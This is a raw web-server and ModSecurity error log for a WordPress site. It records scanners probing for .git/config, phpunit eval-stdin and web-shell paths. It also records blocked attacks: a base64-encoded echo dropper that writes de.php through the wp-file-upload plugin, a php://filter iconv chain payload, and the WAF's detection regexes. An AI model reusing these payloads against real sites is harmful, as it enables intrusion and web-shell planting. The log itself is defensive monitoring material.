[client 52.172.196.64:45826] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Feb 12 01:05:43.140358 2025] [autoindex:error] [pid 8485:tid 139970582660864] [client 157.245.108.90:47218] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Feb 12 01:18:18.318731 2025] [authz_core:error] [pid 9215:tid 139970475968256] [client 206.81.24.74:49168] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/12 01:18:23 [error] 8446#8446: *383029 access forbidden by rule, client: 206.81.24.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/02/12 03:24:10 [error] 8447#8447: *385203 access forbidden by rule, client: 54.84.249.63, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/12 04:39:10 [error] 17661#17661: *388253 access forbidden by rule, client: 54.84.249.63, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/02/12 04:51:58 [error] 17661#17661: *388811 access forbidden by rule, client: 54.84.249.63, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/02/12 05:53:15 [error] 17661#17661: *389482 access forbidden by rule, client: 46.19.138.210, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/12 05:53:16 [error] 17660#17660: *389483 access forbidden by rule, client: 46.19.138.210, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Feb 12 06:21:20.618760 2025] [authz_core:error] [pid 17698:tid 139937139615488] [client 139.59.143.102:43070] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/12 06:21:25 [error] 17660#17660: *389856 access forbidden by rule, client: 139.59.143.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/12 06:43:35 [error] 17661#17661: *390632 access forbidden by rule, client: 54.84.249.63, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/02/12 07:17:32 [error] 17661#17661: *391714 access forbidden by rule, client: 54.84.249.63, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/02/12 09:50:38 [error] 17660#17660: *394316 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/12 13:14:54 [error] 17661#17661: *397067 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/02/12 14:18:54 [error] 17661#17661: *397633 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Feb 13 15:47:33.541916 2025] [autoindex:error] [pid 20769:tid 140530902025984] [client 157.245.108.90:37424] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Feb 14 01:25:12.684639 2025] [authz_core:error] [pid 21335:tid 140531036309248] [client 209.38.248.17:41030] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/14 01:25:19 [error] 20731#20731: *426700 access forbidden by rule, client: 209.38.248.17, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Feb 14 04:33:36.665391 2025] [authz_core:error] [pid 28792:tid 140625609451264] [client 138.197.191.87:52478] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/14 04:33:41 [error] 28755#28755: *428803 access forbidden by rule, client: 138.197.191.87, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Feb 14 05:30:33.023302 2025] [:error] [pid 28793:tid 140625778325248] [client 23.158.56.51:36756] [client 23.158.56.51] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "34"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Z68bSYWyjjNkEz6f_T074QAAAIE"] [Fri Feb 14 06:07:50.465630 2025] [:error] [pid 28791:tid 140625643022080] [client 194.5.82.77:44580] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php:69 [Fri Feb 14 06:07:50.465707 2025] [:error] [pid 28791:tid 140625643022080] [client 194.5.82.77:44580] Stack trace: [Fri Feb 14 06:07:50.465722 2025] [:error] [pid 28791:tid 140625643022080] [client 194.5.82.77:44580] #0 {main} [Fri Feb 14 06:07:50.465841 2025] [:error] [pid 28791:tid 140625643022080] [client 194.5.82.77:44580] thrown in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php on line 69 [Fri Feb 14 06:08:06.244418 2025] [autoindex:error] [pid 28793:tid 140625517131520] [client 194.5.82.77:44608] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Fri Feb 14 06:08:12.645249 2025] [autoindex:error] [pid 28793:tid 140625575880448] [client 194.5.82.77:44626] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Fri Feb 14 06:08:26.400431 2025] [autoindex:error] [pid 28792:tid 140625609451264] [client 194.5.82.77:44652] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Fri Feb 14 06:08:32.773930 2025] [autoindex:error] [pid 28791:tid 140625584273152] [client 194.5.82.77:44666] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 14 06:08:34.091745 2025] [autoindex:error] [pid 28791:tid 140625533916928] [client 194.5.82.77:44672] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Fri Feb 14 06:08:49.468902 2025] [autoindex:error] [pid 28792:tid 140625584273152] [client 194.5.82.77:44700] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Fri Feb 14 06:08:49.688133 2025] [:error] [pid 28791:tid 140625684985600] [client 194.5.82.77:44702] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Fri Feb 14 06:08:53.206266 2025] [autoindex:error] [pid 28791:tid 140625786717952] [client 194.5.82.77:44712] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Fri Feb 14 06:08:56.002095 2025] [autoindex:error] [pid 29353:tid 140625575880448] [client 194.5.82.77:45010] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Fri Feb 14 06:09:13.913495 2025] [autoindex:error] [pid 28792:tid 140625617843968] [client 194.5.82.77:45630] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Fri Feb 14 06:09:22.428844 2025] [autoindex:error] [pid 28792:tid 140625626236672] [client 194.5.82.77:45648] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Fri Feb 14 06:09:26.119366 2025] [autoindex:error] [pid 29353:tid 140625617843968] [client 194.5.82.77:45688] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Fri Feb 14 06:09:31.282622 2025] [autoindex:error] [pid 28792:tid 140625676592896] [client 194.5.82.77:45700] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Fri Feb 14 06:09:32.618367 2025] [autoindex:error] [pid 28792:tid 140625609451264] [client 194.5.82.77:45704] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Fri Feb 14 06:09:35.495413 2025] [:error] [pid 28792:tid 140625542309632] [client 194.5.82.77:45710] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Feb 14 06:10:10.844722 2025] [autoindex:error] [pid 29353:tid 140625601058560] [client 194.5.82.77:45802] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Fri Feb 14 06:10:17.533437 2025] [autoindex:error] [pid 29353:tid 140625559095040] [client 194.5.82.77:45814] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Fri Feb 14 06:10:33.323064 2025] [autoindex:error] [pid 29353:tid 140625617843968] [client 194.5.82.77:45850] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 14 06:10:44.811552 2025] [autoindex:error] [pid 28793:tid 140625525524224] [client 194.5.82.77:45878] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Fri Feb 14 06:11:02.781478 2025] [:error] [pid 29353:tid 140625525524224] [client 194.5.82.77:45926] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Feb 14 06:11:04.268215 2025] [autoindex:error] [pid 28793:tid 140625634629376] [client 194.5.82.77:45930] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Fri Feb 14 06:11:25.981443 2025] [:error] [pid 28793:tid 140625617843968] [client 194.5.82.77:45968] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Fri Feb 14 06:11:49.034363 2025] [:error] [pid 28793:tid 140625643022080] [client 194.5.82.77:46006] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Fri Feb 14 06:12:10.023798 2025] [autoindex:error] [pid 28791:tid 140625567487744] [client 194.5.82.77:46046] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Fri Feb 14 06:13:05.889230 2025] [:error] [pid 29353:tid 140625634629376] [client 194.5.82.77:46176] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php 2025/02/14 09:23:05 [error] 28754#28754: *432049 access forbidden by rule, client: 36.70.104.244, server: investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "www.investigacionperu.com" 2025/02/14 09:23:08 [error] 28754#28754: *432050 access forbidden by rule, client: 36.70.104.244, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "www.investigacionperu.com" 2025/02/14 15:40:37 [error] 28754#28754: *435146 access forbidden by rule, client: 13.58.228.70, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/02/14 15:45:00 [error] 28754#28754: *435189 access forbidden by rule, client: 13.58.228.70, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/02/14 15:49:23 [error] 28755#28755: *435233 access forbidden by rule, client: 13.58.228.70, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/02/14 15:49:23 [error] 28754#28754: *435234 access forbidden by rule, client: 13.58.228.70, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/02/14 15:49:38 [error] 28755#28755: *435238 access forbidden by rule, client: 13.58.228.70, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/02/14 15:50:46 [error] 28754#28754: *435260 access forbidden by rule, client: 13.58.228.70, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/02/14 17:35:29 [error] 28754#28754: *435930 access forbidden by rule, client: 13.58.228.70, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/02/14 17:38:19 [error] 28755#28755: *435961 access forbidden by rule, client: 13.58.228.70, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/02/14 17:38:21 [error] 28754#28754: *435962 access forbidden by rule, client: 13.58.228.70, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Feb 14 18:25:19.760748 2025] [:error] [pid 28793:tid 140625525524224] [client 196.251.115.165:46102] [client 196.251.115.165] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:0: echo `echo pd9wahagzndyaxrlkgzvcgvukcrfu0vsvkvswydet0nvtuvovf9st09uj10ujy9oay5wahanlcd3kycplgzpbgvfz2v0x2nvbnrlbnrzkcdodhrwczovl2dob3n0ymlulnnpdguvb2nidmqvcmf3jykpoybmd3jpdguozm9wzw4ojf9trvjwrvjbj0rpq1vnru5ux1jpt1qnxs4nl2iwec5odg0nlcd3kycplcdiywnrzwqgynkgunhsjyk7pz4= | base64 --decode`>de.php "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2 [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php"] [unique_id "Z6_Q34WyjjNkEz6f_T0-9gAAAJc"] [Fri Feb 14 18:25:27.316710 2025] [:error] [pid 28793:tid 140625643022080] [client 196.251.115.165:46104] [client 196.251.115.165] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:wfu_ABSPATH. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: | found within REQUEST_COOKIES:wfu_ABSPATH: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert..."] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accura [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-file-upload/de.php"] [unique_id "Z6_Q54WyjjNkEz6f_T0-9wAAAIk"] [Fri Feb 14 18:25:33.149980 2025] [:error] [pid 29353:tid 140625584273152] [client 196.251.115.165:46106] [client 196.251.115.165] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:wfu_ABSPATH. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: | found within REQUEST_COOKIES:wfu_ABSPATH: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert..."] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accura [hostname "investigacionperu.com"] [uri "/hk.php"] [unique_id "Z6_Q7d3IT2icOhEu_t11vgAAANA"] [Fri Feb 14 18:25:38.800907 2025] [:error] [pid 28793:tid 140625601058560] [client 196.251.115.165:46108] [client 196.251.115.165] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:wfu_ABSPATH. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: | found within REQUEST_COOKIES:wfu_ABSPATH: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert..."] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accura [hostname "investigacionperu.com"] [uri "/hk.php"] [unique_id "Z6_Q8oWyjjNkEz6f_T0--AAAAI4"] 2025/02/14 20:17:10 [error] 28755#28755: *437490 access forbidden by rule, client: 13.58.228.70, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/02/14 20:22:40 [error] 28754#28754: *437525 access forbidden by rule, client: 13.58.228.70, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/02/14 20:22:41 [error] 28754#28754: *437526 access forbidden by rule, client: 13.58.228.70, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sat Feb 15 04:41:43.832205 2025] [:error] [pid 6477:tid 140211266791168] [client 13.36.172.176:45076] [client 13.36.172.176] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z7BhVyOVbCCcmA7M1nmNhAAAAIE"], referer: www.google.com [Sat Feb 15 04:41:49.043968 2025] [:error] [pid 6477:tid 140211250005760] [client 13.36.172.176:45084] [client 13.36.172.176] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] 